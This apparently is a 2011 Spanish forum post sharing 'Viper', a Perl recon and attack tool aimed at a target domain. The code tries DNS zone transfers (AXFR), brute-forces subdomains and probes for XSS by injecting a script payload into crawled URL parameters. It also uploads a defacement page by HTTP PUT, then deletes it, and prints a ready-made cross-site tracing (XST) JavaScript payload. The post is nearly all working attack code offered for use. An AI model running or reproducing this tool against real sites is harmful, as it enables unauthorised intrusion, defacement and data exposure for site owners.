Viper 0.1 Priv8 Tool By Xianur0

@ed33x · Enero 27, 2011, 08:48:15 PM

Código: perl

#!/usr/bin/perl


  use MIME::Base64::Perl;
  use IO::Socket::SSL;
  use Net::DNS;
  use Net::DNS::RR;
  use NetAddr::IP;
  use LWP::UserAgent;
  use Socket;
  use HTTP::Request::Common;
  use XML::Simple;
  use Getopt::Std;
  use HTML::LinkExtor;
  use URI::URL;
  use HTML::Parser;
  use Data::Dumper;
  use Term::ANSIColor qw(:constants);
    $Term::ANSIColor::AUTORESET = 1;

#Viper By Xianur0
#[email protected]

#CONFIGURACION:
#------------------------------------------
$ver = "0.3";
$useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
%whoisserver = (
         'com', 'whois.crsnic.net',
         'net', 'whois.crsnic.net',
         'edu', 'whois.crsnic.net',
         'org', 'whois.publicinterestregistry.net',
         'info', 'whois.rotld.ro',
	 'mx', 'whois.nic.mx');
$ua = LWP::UserAgent->new;
my $lib = XMLin("libs/lib.xml");
#-------------------------------------------
    print BOLD RED  "\n                                ..::Viper By Xianur0::..\n\n";
my $host = $ARGV[0];
$host = shift || die "[-]Uso: dns.pl [dominio] [opciones]\nOpciones:\n-h HTTP AttackToolKit\n-w Ataque Whois\n-d Ataque DNS\n-a Ejecuta Todo lo Anterior\n-x Testear XSS Mixto\n-t Spider y Testeo de codigo (BETA) [host] -t [path]\n-i Scanner de Paths y RSS (BETA) [host] -i [path]\n";
my $path = $ARGV[1];
my $urlp = "http://".$host.$path;
new NetAddr::IP($host) || die "Error: IP o Dominio Incorrecto!\n"; 
print "\n[-]Inicio del Scanneo: ". localtime()."\n";
        my $opt_string = 'whdtaxi';
        getopts( "$opt_string", \%opt );
        whois() if $opt{w};
        dns() if $opt{d};
        http() if $opt{h};
        todo() if $opt{a};
        xss() if $opt{x};
        info() if $opt{i};
        print "[-]Lanzando Spider!\n". spider($urlp) if $opt{t};
        print "[-]Fin del Scanneo: ". localtime(). "\n";

sub dns() {
&soa;
&mx;
&txt;
&ns;
&hinfo;
&dnsrotativo;
&any;
&zonas;
&xss();
}
sub todo() {
info();
whois();
dns();
http();
xss();
print "[-]Lanzando Spider!\n";
spider($urlp);
}

sub dnsrotativo {
print "[-]Buscando DNS Rotativos (Mediante PTR)...:\n";
my $consulta = new NetAddr::IP($host);
&consultar;
my $inicial = $ipaddr;
&consultar;
while($inicial ne $ipaddr) { &consultar; }
}

sub consultar {
my $consulta = new NetAddr::IP($host) || die "Error: IP o Dominio Incorrecto!\n";
my $resolver = Net::DNS::Resolver->new;
my $hosts = $consulta->num();
for (my $i=0; $i<$hosts; ++$i) {
$ipaddr = $consulta->addr();
if ($ipaddr) {
my $consulta = $resolver->search("$ipaddr");
if ($consulta) {
foreach my $array ($consulta->answer) {
next unless $array->type eq "PTR";
print "IP: $ipaddr\n","Host: " ,$array->ptrdname, "\n\n"; }
} }}
}

sub soa {
print "[-]Registro SOA:\n";
  my $resolver   = Net::DNS::Resolver->new;
  my $consulta = $resolver->query($host, "SOA");
  if ($consulta) {
      ($consulta->answer)[0]->print;
  }
print "\n\n";
}

sub zonas {
if($sdns[0] eq "") { $sdns[0] = $ipaddr;}
   foreach $dnsa (@sdns) {
print "[-]Intentando Ataque AXFR....: Usando: $dnsa...";
  my $consulta = Net::DNS::Resolver->new;
  $consulta->nameservers($dnsa);
  my @zonas = $consulta->axfr($host);
if(!@zonas) { print "Error!..........\n"; &detectarcomodin; } else {
  foreach $array (@zonas) {
      $dat = $array->string;
if($dat =~ "127.0.0.1") {
    print BOLD RED "\n\n[-]Vulnerable a XSS Mixto!\n         [-] $dat\n\n\n";
}
print $dat."\n";
  }     print BOLD RED  "\nVulnerado :D!\n\n";}
print "\n\n";
} }

sub ns {
  my $consulta   = Net::DNS::Resolver->new;
  my $consulta = $consulta->query($host, "NS");
  if ($consulta) {
print "[-]Servidores DNS:\n";
      foreach $array (grep { $_->type eq 'NS' } $consulta->answer) {
print $array->nsdname ."\n";
@sdns = (@sdns, $array->nsdname);
      }
  }
print "\n\n";
}

sub hinfo {
  my $consulta   = Net::DNS::Resolver->new;
  my $consulta = $consulta->query($host, "HINFO");
  if ($consulta) {
print "\n[-]Registro HINFO:\n";
      foreach $array ($consulta->answer) {
      $array->print;
      }}
print "\n\n";
}

sub mx {
  my $resolver   = Net::DNS::Resolver->new;
  my $consulta = $resolver->query($host, "MX");
  if ($consulta) {
print "\n[-]Servidores de Correo: \n";
      foreach $array ($consulta->answer) {
      $array->print; 
}
print "\n";
}
}

sub txt {
  my $resolver   = Net::DNS::Resolver->new;
  my $consulta = $resolver->query($host, "TXT");
  if ($consulta) {
print "\n[-]Registro TXT (Configuracion MX): \n";
      foreach $array ($consulta->answer) {
      $array->print; 
}
print "\n\n";
}
}

sub any {
print "[-]Obteniendo informaciiƒÂ³n Extra:\n";
  my $resolver   = Net::DNS::Resolver->new;
  my $consulta = $resolver->query($host, "ANY");
  if ($consulta) {
      foreach $array ($consulta->answer) {
      $array->print;
  }}
print "\n\n";
}

sub detectarcomodin {
my $consulta = new NetAddr::IP("dnshunterxianur0.$host");
if($consulta) { print "\nServidor Protegido contra DNS Brutes Forces...."; &brute2; } else { print RED  "No Se Detecto Comodin :).\n"; brute();}
}

sub brute() {
if($brute ne "on") {
$brute = "on";
$db = 'libs/db.txt';
my $sub;
open(SUBS, $db) || die "No existe la DB!\n";
if($host =~  "www.") {
my @dat = split("www.", $host);
$hostts = $dat[1];
}
else { $hostts = $host; }
while($sub = <SUBS>){
chomp($sub);
$remoto = "$sub.$hostts";
my $consulta = new NetAddr::IP($remoto);
if($consulta) { print "$remoto existe!\n"; $is = $consulta->addr();
if($is eq "127.0.0.1") {
    print BOLD RED "\n\n[-]Vulnerable a XSS Mixto!\n         [-] $remoto : 127.0.0.1\n\n\n";
}

&robots;}

}
close(SUBS);
}}

sub brute2 {
$url = "detectarcomodinesenlosregistroshost.$host";
  $req = HTTP::Request->new(GET => $url);
  &headers;
  $res = $ua->request($req);
	$estado = $res->code;

if ($estado != ""){
     print "Servidor Protegido Contra Brutes Forces en el Header Host del HTTP :(...\n";
}
else {&brute3; }
}

sub headers {
  $req->header('Accept' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5');
  $req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
  $req->header('Keep-Alive' => '300');
  $req->header('Connection' => 'keep-alive');
  $req->header('Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
}

sub brute3 {
$db = 'db.txt';
my $sub;
open(SUBS, $db) || die "No existe la DB!";
while($sub = <SUBS>){
chomp($sub);
$remoto = "$sub.$host";
my $proto = getprotobyname('tcp');
my $ipaddr = inet_aton($remoto);
my $paddr = sockaddr_in(80, $ipaddr);
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
$conected = connect(SOCKET, $paddr);
close SOCKET;
  if ($conected) {
     print "$remoto Existe!\n";

  }
}
close(SUBS);
}

sub robots {
  $req = HTTP::Request->new(GET => "http://$host/robots.txt");
  &headers;
  $res = $ua->request($req);
  if ($res->is_success) {
if($res->content_type eq 'text/plain' && $res->content != "") {
     print "--------------------------------------------------------------------------------------\n".$res->content."\n--------------------------------------------------------------------------------------\n";
  }
}
}
sub http() {
use IO::Socket; 
print "\n[-]HTTP Attack ToolKit: \n\n";
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'1', );
if(!$sock) {print "No se Pudo Conectar a $host!\n"; } else {
print $sock "OPTIONS / HTTP/1.1\nHost: $host\n\n";
print "-----------------------Headers--------------------------\n";
while ($linea = <$sock>) {
if ($linea =~  "HTTP/1.") {
print "Estado De Respuesta: ".$linea;
}
if ($linea =~  /Server:/) {
print $linea;
for( @{$lib->{server}} ) {
if ($linea =~  "$_->{banner}") { print "Tipo de Servidor: $_->{nombre}\n"; }
}
}
for( @{$lib->{header}} ) {
if ($linea =~  "$_->{banner}") {
if($linea !~ "<") {
my @header = split(": ", $linea);
print "$_->{nombre}".$header[1];
}
 }
}
}
close($sock);
print "-------------------------------------------------\n\n";
#PUT
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "PUT /hacked.htm HTTP/1.1\nHost: $host\nContent-Length: 38\n\r\n\r<h1>Vulnerado por DNS Hunter 0.2</h1>\n\r\n\r";
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a PUT!!....\n      Estado de Respuesta: $_->{numero}\n\n";
 }
}
close($sock);
#TRACE
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "TRACE / HTTP/1.1\nHost: $host\n\r\n\r";
while ($linea = <$sock>) {
if ($linea =~  "message/http") {
print "[-]Vulnerable a TRACE!.....:\nCodigo XST de Demostracion:.\n------------------------------------------\n<script>\nvar xmlhttp = new XMLHttpRequest();\n//var xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');\nActiveXObject('Microsoft.XMLHTTP');\nxmlhttp.open('TRACE','http://$host/',false);\nxmlhttp.send(null);\ntext=xmlhttp.responseText;\ndocument.write(text);\n</script>\n------------------------------------------\n\n";
}
      }
close($sock);
#DELETE
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp',  Timeout=>'10', ); die "No se Pudo Conectar a $host!\n" unless $sock;
print $sock "DELETE /hacked.htm HTTP/1.1\nHost: $host\n\r\n\r";
@linea = (<$sock>);
for( @{$lib->{estado}} ) {
if ($linea[0] =~  $_->{numero}) {
print "[-]Vulnerable a DELETE!!....\n      Estado de Respuesta: $_->{numero}\n\n";
 }
}
close($sock);
}}

sub whois() {
my @hosts = split(/\./, $host);
$extencion = pop(@hosts);
$whoisserver = $whoisserver{$extencion};
if($whoisserver eq "") {print "Whois No Disponible para la Extencion: $extencion";} else {
my $sock = new IO::Socket::INET ( PeerAddr => $whoisserver, PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
print $sock "=".$host."\n";
print "\n[-]Whois ($whoisserver): \n-------------------------<Whois>----------------------------\n\n";
while ($linea = <$sock>) {
if($linea =~ $host) {
print "Server: $linea";
}
if($linea =~ "Whois Server") {
my @dato = split(": ", $linea);
chop($dato[1]);
print "Server Whois Interno: $dato[1]";
my $who = new IO::Socket::INET ( PeerAddr =>$dato[1], PeerPort => 43, Proto => 'tcp',  Timeout=>'10', );
if($who) {
print $who $host."\n";
print "\n[-]<Whois Interno de $host>\n\n"; 
print <$who>;
print "\n\n[-]</Whois Interno de $host>\n\n";
}
} else {
for( @{$lib->{whois}} ) {
if ($linea =~  "$_->{etiqueta}") {
my @dato = split(": ", $linea);
print "$_->{imprimir}".$dato[1]; }
}
}}
print "\n-------------------------</Whois>----------------------------\n\n";
}}

sub spider() {
my $hostt=shift;
if($lista{$hostt} ne $hostt) {
$lista{$hostt} = $hostt;
  my @nexo = ();
  sub tags {
     my($tag, %attr) = @_;
     return if $tag ne 'a';
     push(@nexo, values %attr);
  }
  $p = HTML::LinkExtor->new(\&tags);
  $ua = LWP::UserAgent->new;
  $ua->agent($useragent);
  $res = $ua->request(HTTP::Request->new(GET => $hostt),
                      sub {$p->parse($_[0])});
  if(!$res->is_success) { print YELLOW  "\nUser-Agent: $useragent Bloqueado!\n"; } else {
  my $base = $res->base;
  @nexo = map { $_ = url($_, $base)->abs; } @nexo;
   foreach $url (@nexo) {
my @dat = split("/", $url);
if($dat[0] eq "") { $url = "http://".$host.$url;}
  $url =~ s'='=-1 <script>alert(Fenix)</script> -1'g;
  $req = HTTP::Request->new(GET => $url);
  $req->header('Accept' => 'text/html');
  $res = $ua->request($req);
  if ($res->is_success) {
    $contenido = $res->content;
for( @{$lib->{http}} ) {
if ($contenido =~  "$_->{etiqueta}") {
print "\n\nBug Detectado: $_->{imprimir}".$url."\n\n"; }
}
  }
spider($url);
}
}
}}

sub xss(){
$xssmixto = new NetAddr::IP('localhost.'.$host) || exit;
$ipv = $xssmixto->addr();
if($ipv eq "127.0.0.1") {
print BOLD RED  "\n[-]Vulnerable a XSS Mixto!\n[-]localhost.$host: $ipv\n\n\n";
}
}


sub info() {
    my $lib = XMLin("libs/lib.xml");
    $Term::ANSIColor::AUTORESET = 1;
    $ua = LWP::UserAgent->new;
    my $useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
    my $web = $urlp;
my $parser = HTML::Parser->new(api_version=>3,
start_h=>[\&parsear, 'tag, attr'] ,);
$useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";

&tempse;
&cms;

sub tempse {
print RED "\nLoading Dictionary....\n";
my $temp;
open(TEMPS, "libs/temps.txt") || die "No existe la DB!\n";
while($temp = <TEMPS>){
chomp($temp);
$tempurl = $web."/".$temp;
  $req = HTTP::Request->new(HEAD => $tempurl);
  $req->header('Accept' => 'text/html');
  $ua->agent($useragent);
  $res = $ua->request($req);
  if ($res->is_success) {
print "Interesting File Found: ".$tempurl."\n";
  }
}
}

sub cms {
  my $p = new HTML::Parser;
  $req = HTTP::Request->new(GET => $web);
  $req->header('Accept' => 'text/html');
  $ua->agent($useragent);
  $res = $ua->request($req);
  if($res->is_success) {
$html = $res->content;
sub parsear {
     my ($tag, $attr) = @_;
if($tag =~ "link") {
$type = $attr->{"type"};
if($type =~ "application/") {
$href = $attr->{"href"};
if($href !~ "http://") { $href = "http://$host/$href";}
print "RSS: ".$rss."\n";
}
}
}

}}}

Viper 0.1 Priv8 Tool By Xianur0

@ed33x

Enero 27, 2011, 08:48:15 PM Ultima modificación: Marzo 14, 2015, 09:52:10 AM por Expermicid